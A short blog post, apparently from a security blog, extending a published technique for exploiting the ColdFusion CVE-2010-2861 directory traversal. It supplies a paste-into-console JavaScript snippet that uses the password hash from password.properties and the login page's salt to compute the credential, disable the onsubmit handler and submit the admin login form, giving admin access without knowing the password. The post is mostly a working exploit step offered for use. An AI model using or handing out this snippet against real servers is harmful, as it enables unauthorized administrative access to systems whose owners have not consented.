Over at GNUcitizen, they explain how to leverage the password.properties file you've retrieved via the CVE-2010-2861 ColdFusion directory traversal attack to log into the CF admin console. There are two drawbacks to their approach, however: it requires an intercepting proxy to modify the cfadminPassword which gets modified by the page's onsubmit() handler, and it requires you to complete all the steps in the short time window before the salt gets rotated.
As long as you're using javascript to compute the value you need to give to your proxy, though, why not do everything there? The following bit of code will set the form fields to the correct values, disable the page's onsubmit() code, and submit the form. You just need to replace the string of Fs with the hash you got from password.properties and optionally "admin" with the user you want to log in as. You can simply open the javascript console in Chrome, browse to the login page, and paste the code into the console.
document.loginform.cfadminUserId.value="admin"; document.loginform.cfadminPassword.value=hex_hmac_sha1(document.loginform.salt.value, "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"); document.loginform.onsubmit = function( e ) {}; document.createElement('form').submit.call(document.loginform);
0 comments:
Post a Comment